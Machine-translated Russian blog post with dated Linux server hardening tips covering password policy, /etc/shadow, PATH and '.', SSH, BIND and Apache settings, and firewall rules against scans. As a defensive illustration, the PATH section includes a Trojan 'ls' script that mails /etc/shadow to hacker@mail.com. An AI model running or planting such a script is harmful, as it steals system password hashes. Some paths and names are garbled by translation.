Я долгое время ничего не публиковал в блоге и хотел бы поделиться с вами некоторыми советами, взятыми из книги, которая (среди прочего). Я нашел его в университете и только что прочитал, и хотя, честно говоря, он немного устарел и показанные методы вряд ли будут работать с учетом эволюции системы, они также представляют собой интересные аспекты, которые можно показать.
Я хочу уточнить, что это советы, ориентированные на систему Linux, которая используется в качестве сервера, в среднем или, возможно, крупном масштабе, учитывая, что на уровне пользователя настольного компьютера, хотя они могут быть применены, они не будут очень полезными.
Я также отмечу, что это простые быстрые подсказки, и я не буду вдаваться в подробности, хотя я планирую сделать еще один гораздо более конкретный и обширный пост по конкретной теме. Но я увижу это позже. Давайте начнем.
Политики паролей.
Хотя это звучит как крылатая фраза, наличие хорошей политики паролей делает разницу между уязвимой системой или нет. Такие атаки, как «грубая сила», используют неверный пароль для доступа к системе. Самые распространенные советы:
- Комбинируйте прописные и строчные буквы.
- Используйте специальные символы.
- Числа.
- Более 6 цифр (надеюсь, более 8).
В дополнение к этому, давайте рассмотрим два важных файла. / etc / passwd и / etc / shadow.
Очень важно то, что файл / etc / passwd. Помимо имени пользователя, его uid, пути к папке, bash и т. Д. в некоторых случаях он также показывает зашифрованный ключ пользователя.
Посмотрим на его типичный состав.
desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash
пользователь: cryptkey: uid: gid: path :: path: bash
Настоящая проблема здесь в том, что этот конкретный файл имеет разрешения -rw-r - r– Это означает, что у него есть права на чтение для любого пользователя системы. и имея зашифрованный ключ, не очень сложно расшифровать настоящий.
Вот почему файл существует / etc / shadow. Это файл, в котором, помимо прочего, хранятся все пользовательские ключи. Этот файл имеет необходимые разрешения, поэтому никто не может его прочитать.
Чтобы исправить это, мы должны перейти к файлу / И т.д. / пароль и измените зашифрованный ключ на "x", это сохранит ключ только в нашем файле / etc / shadow.
desdelinux:x:500:501::/home/usuario1:/bin/bash
Проблемы с PATH и .bashrc и другими.
Когда пользователь выполняет команду на своей консоли, оболочка ищет эту команду в списке каталогов, содержащемся в переменной среды PATH.
Если вы наберете в консоли «echo $ PATH», он выдаст что-то вроде этого.
.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin
В каждой из этих папок оболочка будет искать команду, написанную для ее выполнения. Он "." это означает, что первая папка, которую нужно искать, - это та же папка, из которой выполняется команда.
Предположим, есть пользователь «Карлос», и этот пользователь хочет «творить зло». Этот пользователь может оставить файл с именем "ls" в своей основной папке и выполнить в этом файле такую команду:
#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls
И если пользователь root для вещей назначения пытается перечислить папки внутри папки carlos (поскольку он сначала ищет команду в той же папке, он случайно отправит файл с паролями на это электронное письмо, а затем будут перечислены папки и он узнает только очень поздно.
Чтобы этого избежать, мы должны удалить символ "." переменной PATH.
Таким же образом следует проверить файлы, такие как /.bashrc, /.bashrc_profile, ./.login, и убедиться в отсутствии "." в переменной PATH и фактически из файлов, подобных этому, вы можете изменить место назначения определенной команды.
Советы по услугам:
ТСС
- Отключите версию 1 протокола ssh в файле sshd_config.
- Не позволяйте пользователю root входить в систему по ssh.
- Файлы и папки ssh_host_key, ssh_host_dsa_key и ssh_host_rsa_key должны быть прочитаны только пользователем root.
BIND
- Измените приветственное сообщение в файле named.conf, чтобы в нем не отображался номер версии.
- Ограничивайте передачу зон и включайте их только для тех команд, которым это нужно.
апаш
- Запретить службе отображать вашу версию в приветственном сообщении. Отредактируйте файл httpd.conf и добавьте или измените строки:
ServerSignature Off
ServerTokens Prod
- Отключить автоматическое индексирование
- Настройте apache так, чтобы он не обслуживал конфиденциальные файлы, такие как .htacces, * .inc, * .jsp и т. Д.
- Удалите страницы руководства или образцы из службы
- Запустите apache в chrooted-окружении
Сетевая безопасность.
Важно перекрыть все возможные входы в вашу систему из внешней сети. Вот несколько важных советов, которые помогут предотвратить сканирование и получение информации из вашей сети злоумышленниками.
Блокировать ICMP-трафик
Брандмауэр должен быть настроен для блокирования всех типов входящего и исходящего трафика ICMP и эхо-ответов. Таким образом вы избегаете того, что, например, сканер, который ищет живое оборудование в диапазоне IP, обнаружит вас.
Избегайте сканирования TCP ping.
Один из способов сканирования вашей системы - сканирование TCP ping. Предположим, что на вашем сервере есть сервер Apache на 80-м порту. Злоумышленник может отправить запрос ACK на этот порт, при этом, если система отвечает, компьютер будет активен и просканирует остальные порты.
Для этого в вашем брандмауэре всегда должна быть опция «осведомленность о состоянии», и он должен отбрасывать все пакеты ACK, которые не соответствуют уже установленному TCP-соединению или сеансу.
Несколько дополнительных советов:
- Используйте системы IDS для обнаружения сканирования портов в вашей сети.
- Настройте брандмауэр так, чтобы он не доверял настройкам порта источника подключения.
Это связано с тем, что при некоторых сканированиях используется «поддельный» порт источника, например 20 или 53, поскольку многие системы доверяют этим портам, поскольку они типичны для ftp или DNS.
Примечание: Помните, что большинство проблем, указанных в этом посте, уже решены практически во всех текущих дистрибутивах. Но никогда не помешает иметь ключевую информацию об этих проблемах, чтобы они не случились с вами.
Примечание: Позже я увижу конкретную тему и сделаю пост с более подробной и актуальной информацией.
Спасибо всем за чтение.
Привет.
Мне очень понравилась статья, и я заинтересован в теме, я призываю вас продолжать загружать контент.